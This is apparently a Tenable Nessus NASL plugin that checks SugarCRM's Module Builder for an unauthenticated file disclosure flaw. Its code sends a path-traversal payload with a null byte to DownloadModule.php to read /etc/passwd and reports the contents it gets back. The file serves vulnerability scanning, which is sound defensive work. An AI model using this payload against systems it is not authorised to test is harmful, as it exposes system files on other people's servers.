#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by an
information disclosure vulnerability. 

Description :

The remote host is running Module Builder, a module for building
SugarCRM modules. 

The version of Module Builder installed on the remote host fails to
validate user-supplied input to the 'file' parameter of the
'modules/Builder/DownloadModule.php' script before using it to return
the contents of a file.  An unauthenticated remote attacker can
exploit this issue to view arbitrary files on the remote host, subject
to the privileges of the web server user id. 

Note that unless PHP's 'magic_quotes_gpc' setting is disabled, an
attacker will only be able to retrieve files with names ending with
'.zip'. 

See also :

http://www.milw0rm.com/exploits/4591

Solution :

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(27597);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(26275);

  script_name(english:"Module Builder DownloadModule File Disclosure Vulnerability");
  script_summary(english:"Tries to read a local file with Module Builder");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("sugarcrm_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/sugarcrm"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # Try to exploit the flaw to read a file.
  file = "../../../../../../../../../../../../../etc/passwd%00";

  req = http_get(
    item:string(
      dir, "/modules/Builder/DownloadModule.php?",
      "file=", file
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(pattern:"root:.*:0:[01]:", string:res))
  {
    contents = res;
    # nb: avoid displaying errors if "modules/Builder/cache/ModuleBuilder"
    #     directory doesn't exist and PHP's display_errors is enabled.
    while ("<br />" >< contents)
      contents = strstr(contents, "<br />") - "<br />";

    report = string(
      desc,
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Here are the contents of the file '/etc/passwd' that Nessus\n",
      "was able to read from the remote host :\n",
      "\n",
      contents
    );

    security_warning(port:port, data:report);
    exit(0);
  }
}
